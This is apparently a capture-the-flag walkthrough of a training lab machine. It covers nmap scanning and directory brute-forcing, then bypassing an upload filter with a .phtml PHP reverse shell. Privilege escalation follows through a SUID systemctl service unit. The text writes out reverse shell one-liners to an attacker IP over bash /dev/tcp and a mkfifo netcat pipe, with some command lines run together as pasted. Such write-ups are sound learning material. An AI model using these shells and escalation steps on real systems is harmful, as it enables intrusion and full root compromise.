[Task 1] Deploy the machine
[Task 2] Reconnaissance
Cheat sheet reference: https://www.stationx.net/nmap-cheat-sheet/
1–3. Scan box:
nmap -sV <machines ip>
4. How many ports will nmap scan if the flag -p-400 was used?
5. Using the nmap flag -n what will it not resolve?
ANS: dns
6. What is the most likely operating system this machine is running?
I’ll use this command once and for all
nmap -A -T5 <ip> -vv
7. What port is the web server running on?
ANS: It’s in #1
8. Its important to ensure you are always doing your reconnaissance thoroughly before progressing. Knowing all open services (which can all be points of exploitation) is very important, don’t forget that ports on a higher range might be open so always scan ports after 1000 (even if you leave scanning in the background)
Using nmap vuln script
nmap --script vuln <ip>
Scan high ports
nmap -T5 -p- -vv <ip>
Telnet to ftp
telnet <ip> <port no.>
SSH
ssh <ip>
Explore http site
Try to click every function/button, nothing so far
View source, nothing so far
Inspect sources and network. Now I know that this site is JS application.
Conclusion
There’re 5 tcp ports on this server.
Port 3333 with httpd service has a JS web app.
[Task 3] Locating directories using GoBuster
- Lets first start of by scanning the website to find any hidden directories. To do this, we’re going to use GoBuster.
gobuster dir -u http://<ip>:3333/ -w rockyou.txt
It’s too slow, I will user dirbuster instead.
Access each directories and I find something in “internal” and “internal/uploads”.
2. What is the directory that has an upload form page?
ANS: It’s in #1.
[Task 4] Compromise the webserver
- Try upload a few file types to the server, what common extension seems to be blocked?
I uploaded php reverse shell, but it was not allowed.
2. To identify which extensions are not blocked, we’re going to fuzz the upload form.
Intercept traffic with Burp Suite
Right-click and send to Intruder
At payload options, create list
At position, clear all $ and add $ as highlited
Start attack
I don’t see the difference, I’ll try it manually.
Upload “reverse_shell.phtml”
Success
Verify upload result in “/internal/uploads/”
At the attacker’s machine, type
nc -lvp 1234
Click at the uploaded file
Back to the attacker’ machine, we have a shell.
3. We’re going to use Intruder (used for automating customised attacks).
— skipped, I already done in #2
4. Now we know what extension we can use for our payload we can progress.
ANS: It’s in #2.
5. What user was running the web server?
cat /etc/passwd
6. What is the user flag?
cd /home/billls
cat user.txt
[Task 5] Privilege Escalation
- On the system, search for all SUID files. What file stands out?
Reference: https://www.hackingarticles.in/linux-privilege-escalation-using-suid-binaries/
find / -perm -u=s -type f 2>/dev/null
2. Become root and get the last flag (/root/root.txt)
Reference:
- https://gtfobins.github.io/gtfobins/systemctl/
- https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
read “root.txt”
eop=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' >$eop/bin/systemctl link $eop
/bin/systemctl enable --now $eop
cd /tmp
ls
cat output
3. Finally, let’s get root privilege
Reference: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
Try Bash
eop=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "bash -i >& /dev/tcp/<ip>/8080 0>&1"
[Install]
WantedBy=multi-user.target' >$eop
Back to attacker’s machine
nc -lvp 8080
Back to victim’s machine
/bin/systemctl link $eop
/bin/systemctl enable --now $eop
Not work!!!
Try Netcat
eop=$(mktemp).serviceecho '[Service]
ExecStart=/bin/sh -c "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> 8080 >/tmp/f"
[Install]
WantedBy=multi-user.target' >$eop
Back to attacker’s machine
nc -lvp 8080
Back to victim’s machine
/bin/systemctl link $eop
/bin/systemctl enable --now $eop
Back to attacker’s machine, It’s work
whoami